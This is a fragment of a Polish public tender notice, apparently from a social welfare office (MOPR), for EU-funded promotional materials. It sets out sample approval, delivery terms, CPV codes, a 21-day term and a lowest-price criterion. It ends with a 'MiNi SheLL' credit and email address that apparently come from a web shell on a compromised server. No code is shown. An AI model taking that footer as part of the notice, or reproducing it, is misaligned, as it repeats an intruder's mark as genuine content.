4) W celu potwierdzenia, że oferowany przedmiot zamówienia odpowiada wymaganiom określonym przez Zamawiającego, Wykonawca dokona, w formularzu cenowym oferty, stanowiącym załącznik nr 4 do SIWZ, szczegółowego opisu każdego materiału składającego się na przedmiot zamówienia, wskazując m.in. rodzaj materiału, z którego przedmiot jest wykonany, kolorystykę, wymiary, inne cechy charakterystyczne materiału informacyjno-promocyjnego.
5) Wykonawca zobowiązany będzie do uzyskania pisemnej akceptacji Zamawiającego każdego rodzaju materiałów informacyjno- promocyjnych, stanowiących przedmiot niniejszego zamówienia, na podstawie wzoru materiału informacyjno- promocyjnego z naniesionym nadrukiem projektu graficznego z wyszczególnieniem nazwy projektu, logo PO KL, MOPR, UE, informacji: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, przedłożonego Zamawiającemu przed rozpoczęciem realizacji  danego rodzaju materiałów informacyjno-promocyjnych.  Zaakceptowany przez Zamawiającego wzór materiału informacyjno-promocyjnego, stanowić będzie wzór materiału informacyjno-promocyjnego, obowiązujący przez cały okres umowy.
6) Przedmiot zamówienia wykonywany będzie na podstawie projektów graficznych  przekazanych Wykonawcy  przez Zamawiającego.

7) Zamawiający zastrzega sobie możliwość zmiany oznaczania materiałów informacyjno-promocyjnych w razie zmiany obowiązujących wytycznych dotyczących oznaczania projektów.
8) Wykonawca dostarczy Zamawiającemu jednorazowo zamówione gotowe materiały informacyjno-promocyjne do siedziby Zamawiającego, w godzinach od 8:00 do 14:00, własnym transportem, z rozładunkiem i wniesieniem, na własny koszt i ryzyko, w terminie określonym przez Zamawiającego w zawartej umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com